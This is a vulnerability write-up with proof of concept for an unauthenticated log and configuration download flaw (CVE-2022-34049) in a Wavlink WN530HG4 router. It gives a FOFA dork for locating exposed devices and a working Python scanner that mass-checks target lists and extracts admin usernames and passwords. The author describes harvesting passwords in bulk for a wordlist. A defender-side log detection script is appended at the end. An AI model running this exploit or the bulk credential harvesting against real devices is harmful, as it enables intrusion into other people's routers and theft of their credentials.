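Vulnerability description
An access control issue exists in Wavlink WN530HG4 M30HG4.V5030.191116: an unauthenticated attacker can download log files and configuration data.
Affected versions
Wavlink WN530HG4 M30HG4.V5030.191116
Vulnerability reproduction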
fofa:title="Wi-Fi APP Login"
payload:/cgi-bin/ExportLogs.sh
POC
```python
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import requests
import argparse
import sys
import re
import urllib3

# Requests are sent with verify=False, so suppress the certificate warnings.
urllib3.disable_warnings()


def title():
    print("""
    Author:Henry4E36
    """)


class information(object):
    def __init__(self, args):
        self.args = args
        self.url = args.url
        self.file = args.file

    def target_url(self):
        # The export script is requested without any session or credentials.
        target_url = self.url + "/cgi-bin/ExportLogs.sh"
        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0",
        }
        try:
            res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)
            # An affected device returns the export, which contains Login= and Password= entries.
            if res.status_code == 200 and "Login" in res.text and "Password" in res.text:
                print(f"\033[31m[{chr(8730)}] 目标系统: {self.url} 存在Wavlink 导出日志配置未授权访问下载漏洞\033[0m")
                pattern1 = re.compile(r"Login=(.*)")
                pattern2 = re.compile(r"Password=(.*)")
                username = pattern1.findall(res.text)[0]
                password = pattern2.findall(res.text)[0]
                print(f"\033[31m[{chr(8730)}] 用户名: {username} 密码:{password}\033[0m")
                print("[" + "-"*100 + "]")
            else:
                print(f"[\033[31mx\033[0m] 目标系统: {self.url} 不存在Wavlink 导出日志配置未授权访问下载漏洞")
                print("[" + "-"*100 + "]")
        except Exception:
            print("[\033[31mX\033[0m] 连接错误!")
            print("[" + "-"*100 + "]")

    def file_url(self):
        # One target per line; prepend a scheme when it is missing.
        with open(self.file, "r") as urls:
            for url in urls:
                url = url.strip()
                if url[:4] != "http":
                    url = "http://" + url
                self.url = url.strip()
                self.target_url()


if __name__ == "__main__":
    title()
    parser = argparse.ArgumentParser(description=' Wavlink 导出日志配置未授权访问下载')
    parser.add_argument("-u", "--url", type=str, metavar="url", help='Target url eg:"http://127.0.0.1"')
    parser.add_argument("-f", "--file", metavar="file", help='Targets in file eg:"ip.txt"')
    args = parser.parse_args()
    # Exactly one option with its value is expected.
    if len(sys.argv) != 3:
        print(
            "[-] 参数错误!\neg1:>>>python3 CVE-2022-34049.py -u http://127.0.0.1\neg2:>>>python3 CVE-2022-34049.py -f ip.txt")
    elif args.url:
        information(args).target_url()
    elif args.file:
        information(args).file_url()
```
Using the data collected from fofa, I ran a batch over it and collected the password fields; they can be added to a wordlist.
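
A defender-side check for the request described above, as an added example that is not part of the original post: it scans web access logs for requests to `/cgi-bin/ExportLogs.sh` and reports which sources were actually served the export. The Combined Log Format input (from a proxy or sensor in front of the device), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path named on this page, lowercased for comparison after normalisation.
EXPORT_PATH = "/cgi-bin/exportlogs.sh"

# Assumed input: Combined Log Format from a proxy or sensor in front of the device.
CLF = re.compile(
    r'(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def normalise(target):
    """Drop the query string, decode percent-escapes, collapse slashes, lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_export_requests(lines):
    """Map source address -> [(timestamp, status, bytes)] for requests to the export script."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if not m or normalise(m["target"]) != EXPORT_PATH:
            continue
        size = 0 if m["size"] == "-" else int(m["size"])
        hits[m["src"]].append((m["ts"], int(m["status"]), size))
    return dict(hits)

def served(hits):
    """Sources that received a 200 with a body, i.e. the export was delivered."""
    return sorted(src for src, events in hits.items()
                  if any(st == 200 and sz > 0 for _, st, sz in events))

# Constructed sample lines using documentation address ranges, not real traffic.
SAMPLE = [
    '198.51.100.7 - - [12/Jul/2022:03:14:07 +0000] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 200 48213 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jul/2022:03:14:09 +0000] "GET /index.html HTTP/1.1" 200 1520 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [12/Jul/2022:04:01:55 +0000] "GET /cgi-bin//%45xportLogs.sh?x=1 HTTP/1.1" 200 48190 "-" "curl/7.81.0"',
    '192.0.2.33 - - [12/Jul/2022:05:20:11 +0000] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 403 0 "-" "python-requests/2.28.1"',
]

if __name__ == "__main__":
    hits = find_export_requests(SAMPLE)
    for src in served(hits):
        print(f"export delivered to {src}: {hits[src]}")
```

If `served()` lists any source other than the administrator's own address, treat the credentials in the export as exposed and change them.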